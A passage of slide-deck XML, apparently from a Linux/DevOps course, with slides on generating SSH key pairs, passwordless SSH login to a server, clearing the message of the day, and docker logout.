                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Public Key (id_rsa.pub)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cat ~/.ssh/authorized_keys</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ssh-rsa xxxxxxxxxxxx == anildalar8888@gmail.com</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4530" name="Google Shape;4530;p735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368950" y="155275"/>
            <a:ext cx="8520600" cy="8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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to login to a server without password?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4531" name="Google Shape;4531;p735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558100" y="1404000"/>
            <a:ext cx="8142300" cy="3481800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh-keygen -t rsa -b 4096 -C "your_email@example.com"</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	ssh -i ~/.ssh/id_rsa username@ip</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh -i ~/.ssh/id_rsa root@45.136.17.143</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh root@45.136.17.143</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4535"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4536" name="Google Shape;4536;p736"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ssh key pair ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4537" name="Google Shape;4537;p736"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558100" y="1246150"/>
            <a:ext cx="8142300" cy="3639600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh-keygen -t rsa -b 4096 -C "your_email@example.com"</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public Key = id_rsa.pub</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Private Key = id_rsa</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4542" name="Google Shape;4542;p737"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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900">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to remove motivation of the day message</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4543" name="Google Shape;4543;p737"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558100" y="1246150"/>
            <a:ext cx="8142300" cy="3639600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo ‘’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /etc/motd</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4547"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4548" name="Google Shape;4548;p738"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create dev,state,qa and prod environment?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4549" name="Google Shape;4549;p738"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558100" y="1246150"/>
            <a:ext cx="8142300" cy="3639600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4553"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4554" name="Google Shape;4554;p7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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to flush docker login on terminal?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4555" name="Google Shape;4555;p7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500">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker logout</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4559"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4560" name="Google Shape;4560;p740"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5191975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4564"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4565" name="Google Shape;4565;p741"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="4603526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4569"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4570" name="Google Shape;4570;p742"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4571" name="Google Shape;4571;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964250" y="1942800"/>
            <a:ext cx="4014300" cy="41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rPr>
              <a:t>ssh -i ~/.ssh/id_rsa user@ip</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4572" name="Google Shape;4572;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421525" y="2583100"/>
            <a:ext cx="10491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C:\&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4573" name="Google Shape;4573;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978450" y="2466275"/>
            <a:ext cx="23322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user@hostname:~#</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4574" name="Google Shape;4574;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978450" y="308450"/>
            <a:ext cx="15870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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>45.136.17.143</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4575" name="Google Shape;4575;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907425" y="2945300"/>
            <a:ext cx="1851000" cy="417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rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh-keygen</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4576" name="Google Shape;4576;p742"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687925" y="159900"/>
            <a:ext cx="1270174" cy="362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4577" name="Google Shape;4577;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="97725" y="878650"/>
            <a:ext cx="14166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PrivateKey</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4578" name="Google Shape;4578;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7331300" y="1524900"/>
            <a:ext cx="14166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PublicKey</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4579" name="Google Shape;4579;p742"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212400" y="1794275"/>
            <a:ext cx="2931600" cy="4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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat ~/.ssh/authorized_keys</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4583"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4584" name="Google Shape;4584;p74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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove Image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
